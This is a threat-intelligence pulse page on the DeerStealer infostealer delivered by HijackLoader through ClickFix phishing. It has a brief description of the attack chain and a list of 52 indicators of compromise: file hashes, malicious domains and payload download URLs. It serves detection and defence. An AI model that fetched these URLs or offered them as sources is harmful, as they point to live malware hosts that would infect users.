← Back to Pulse Feed
PULSE DETAIL
PULSE NAME
Don't Get Caught in the Headlights - DeerStealer Analysis
WHITE PetrP.73 2025-06-13 Modified: 2025-06-13
52
IOCs
HIGH VOLUME
In May 2025, threat actors increasingly attempted to download and execute a sophisticated malware known as HijackLoader, often using DeerStealer—an information-stealer marketed on dark-web forums by the user "LuciferXfiles"—as the final payload. The primary access method observed in these attack chains is called ClickFix, which exploits users by redirecting them to phishing pages prompting the execution of malicious commands in the Windows Run Prompt. The initial sequence involves loading an unsigned version of a legitimate DLL named "cmdres.dll," which has been manipulated to facilitate the execution of HijackLoader.
deerstealer c2deerstealerdropperhijackloaderhash
MITRE ATT&CK & Malware Families
ATT&CK TECHNIQUES
Indicators of Compromise (52)
All FileHash-MD5 FileHash-SHA1 FileHash-SHA256 URL domain hostname
TYPEINDICATORDESCRIPTIONCREATED
FileHash-MD5 c3f7390f7dbd641fde7eb2922f968345 MD5 of 3a03afc1313854359603522e0792f6a8f9153519eac645cf5811824d936cfbc7 2025-06-13
FileHash-SHA1 45592b1d7091d22706da0d64010f54187b5a85dd SHA1 of 3a03afc1313854359603522e0792f6a8f9153519eac645cf5811824d936cfbc7 2025-06-13
FileHash-SHA256 02d0f858069426ee5bbf04d5d85ff053d8f86867f4fbedb5ef70f78cb2acf086 2025-06-13
FileHash-SHA256 163cfcb8a2c2e14cb77e0d735b87f56ae653d58ad5c69c536396f2936afd1c72 2025-06-13
FileHash-SHA256 24475ae7781189075f64a2de1a7d1fd69b341b7adee67f0bd2286cfbf1f0b7f9 2025-06-13
FileHash-SHA256 3a03afc1313854359603522e0792f6a8f9153519eac645cf5811824d936cfbc7 2025-06-13
FileHash-SHA256 4eae5c64da09969299fd3c1fe05d91f67a425a1e1431b926fda289e4b94fd550 2025-06-13
FileHash-SHA256 674476acafaa975bb80ee9ea7ae24e0bbedb1d1d5c3b3871f718b857b066579d 2025-06-13
FileHash-SHA256 9163f9237ad869a74715f9b126f7c577bd1f12afb8eae37ba07c11f00a39fa3e 2025-06-13
FileHash-SHA256 e34d753f2b992cf74c1b9db61bad4d6c6089ab8ef9fb942c865290b2dd64b4ad 2025-06-13
FileHash-SHA256 eb17f8296482b0c096a2249844a62988b6abdd8ffe8cbbe3398f422968d46875 2025-06-13
URL https://luckyseaworld.com/now.txt 2025-06-13
URL https://luckyseaworld.com/nownow.txt 2025-06-13
URL https://www.aggiornamentoaggiornamento.com/big.msi 2025-06-13
domain brokpolok.shop 2025-06-13
domain cdnnode-01.cfd 2025-06-13
domain cloused-flow.site 2025-06-13
domain d-nodes.shop 2025-06-13
domain debianlist.cfd 2025-06-13
domain luckyseaworld.com 2025-06-13
domain ncloud-servers.shop 2025-06-13
domain quitarlosi.cfd 2025-06-13
domain sciecdn.cfd 2025-06-13
domain servicesmesh.pro 2025-06-13
domain soft-metal-software.cfd 2025-06-13
domain sonorous-horizon-cfd.cfd 2025-06-13
domain upcdnnodes.cfd 2025-06-13
domain uplink-mirrors.shop 2025-06-13
hostname www.aggiornamentoaggiornamento.com 2025-06-13
URL https://d-nodes.shop/DDF 2025-06-13
URL https://d-nodes.shop/ngs 2025-06-13
URL https://d-nodes.shop/ngshDb 2025-06-13
URL https://brokpolok.shop/LRIOVUHD.msi 2025-06-13
URL https://brokpolok.shop/TGFAXKCL.msi 2025-06-13
URL https://brokpolok.shop/XQJFCIHF.msi 2025-06-13
URL https://brokpolok.shop/s 2025-06-13
URL https://brokpolok.shop/s3 2025-06-13
URL https://sciecdn.cfd/gone-2.html 2025-06-13
URL https://ncloud-servers.shop/Hellcat-VI.aspxM 2025-06-13
hostname ethos-lk.luckyseaworld.com 2025-06-13
hostname ruffpawpack.luckyseaworld.com 2025-06-13
URL http://luckyseaworld.com/~therobo3/aHR0cDovL2RqZWttYW5pNGV2ZXIuZnJlZS5mci9zaGVsbC/Confirm.php 2025-06-13
URL https://luckyseaworld.com/812.txt 2025-06-13
URL https://luckyseaworld.com/coin.msi 2025-06-13
URL https://luckyseaworld.com/coin.msi$GMFQ 2025-06-13
URL https://luckyseaworld.com/coin.txt 2025-06-13
URL https://luckyseaworld.com/main.exe 2025-06-13
URL https://luckyseaworld.com/now.txt/ 2025-06-13
URL http://www.aggiornamentoaggiornamento.com/requestverificationclodflare.txt 2025-06-13
URL https://www.aggiornamentoaggiornamento.com/mnogo.exe 2025-06-13
URL https://www.aggiornamentoaggiornamento.com/requestverificationclodflare.txt 2025-06-13
URL https://www.aggiornamentoaggiornamento.com/wp-content/uploads/2021/04/OPTIMA.woff 2025-06-13